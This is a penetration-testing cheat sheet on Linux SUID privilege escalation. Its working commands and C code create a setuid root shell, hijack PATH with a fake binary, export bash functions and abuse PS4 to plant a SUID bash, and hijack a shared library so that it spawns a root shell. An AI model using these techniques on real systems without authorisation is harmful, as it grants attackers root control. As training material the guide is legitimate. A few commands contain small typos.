SUID Binaries

Theory

SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is root, the uid will be changed to root even if it was executed from user bob. SUID bit is represented by an s.

Practice

Misc SUID Binaries

We can use this command to find all SUID binaries

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -perm -4000 -type f 2>/dev/null

Here is how to create a SUID binary

print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c   
gcc -o /tmp/suid /tmp/suid.c  
sudo chmod +x /tmp/suid # execute right
sudo chmod +s /tmp/suid # setuid bit

No Command Path Exploit

If a suid binary executes another command without specifying the path. We can abuse it and get a privilege escalation.

You may use strings to spot other binaries calls, or do some reverse engineering on the suid binary.

strings ./the-suid-bin

...
find
...

We can create a malicious executable with the same name as the one called by the suid binary.

echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

Then, set the PATH env variable before executing the SUID binary.

#Sudo with modified PATH
export PATH=/tmp:$PATH 
./the-suid-bin

Functions Export Exploit - Full Path Binary

If the suid binary executes another command specifying the full path, then, we can try to export a function named as the command that the suid file is calling.

You may use strings to spot others binary/command calls, or do some reverse engineering on the suid binary.

strings ./the-suid-bin

...
/usr/sbin/service apache2 start
...

we can try to export a function named as the command that the suid file is calling.

For example, if a suid binary calls /usr/sbin/service apache2 start you have to try to create the function and export it:

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service

Then, execute the SUID binary.

./the-suid-bin

An other method is to type the following command:

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c './the-suid-bin; set +x; /tmp/bash -p'

Shared Library Hijacking

If you find some binary with SUID permissions, you could check if all the .so files are loaded correctly

strace the-suid-bin 2>&1 | grep -i -E "open|access|no such file"

You also could check if the SUID binary is loading a library from a folder where we can write:

# Lets find a SUID using a non-standard library
ldd the-suid-bin
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID also loads libraries from a custom location where we can write
readelf -d the-suid-bin | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

Alternatively, you could use the strings command to find used shared library

strings ./the-sudo-bin | grep -i '*.so*'

For example, if you find that the suid binary doesn't load correctly /home/user/.config/libcalc.so or that you can overwrite it, you can exploit it.

Write a malicious shared library

//Saved to /home/user/.config/libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        setresuid(0,0,0);
        system("/bin/bash -p");
}

Compile it

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

Execute the SUID binary

./SUID-BINARY

If you get an error such as

./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name

that means that the library you have generated need to have a function called a_function_name.

References

Linux Privilege EscalationHackTricks

TryHackMe | Linux PrivEsc ArenaTryHackMe

Last updated 1 year ago